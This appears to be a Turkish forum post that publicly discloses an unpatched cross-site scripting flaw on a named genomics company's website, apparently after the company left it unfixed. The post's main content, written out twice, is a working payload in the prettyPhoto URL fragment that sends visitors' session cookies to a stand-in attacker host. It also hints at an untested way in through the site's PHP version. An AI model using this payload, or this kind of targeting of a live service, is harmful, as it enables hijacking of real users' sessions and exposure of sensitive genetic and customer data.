Paylaşmayacağım dedim ama onlar da açığı kapatmayınca dayanamadım. 
Bir arkadaşım burdan alışveriş yaptı. Ben de sitesine bir el atayım dedim.
Site: https://genomize.com
Exploit: /#prettyPhoto[pp_gal]/2,<img src=x onerror=javascript:window.open('http://www.saldırgan.com/sendcookie.php?cookie='+document.cookie)>/
23andme gibi genlerinizden bir sürü bilgi bulan bir şirket. Şuan çok önemli veriler gizlediklerini düşünmüyorum ama ilerde yapılacak değişikliklerle XSS açığı vurguna sebep olabilir.
+ PHP sürümünden sızabilirsiniz. (Henüz denemedim.)
Bir arkadaşım burdan alışveriş yaptı. Ben de sitesine bir el atayım dedim.
Site: https://genomize.com
Exploit: /#prettyPhoto[pp_gal]/2,<img src=x onerror=javascript:window.open('http://www.saldırgan.com/sendcookie.php?cookie='+document.cookie)>/
23andme gibi genlerinizden bir sürü bilgi bulan bir şirket. Şuan çok önemli veriler gizlediklerini düşünmüyorum ama ilerde yapılacak değişikliklerle XSS açığı vurguna sebep olabilir.
+ PHP sürümünden sızabilirsiniz. (Henüz denemedim.)
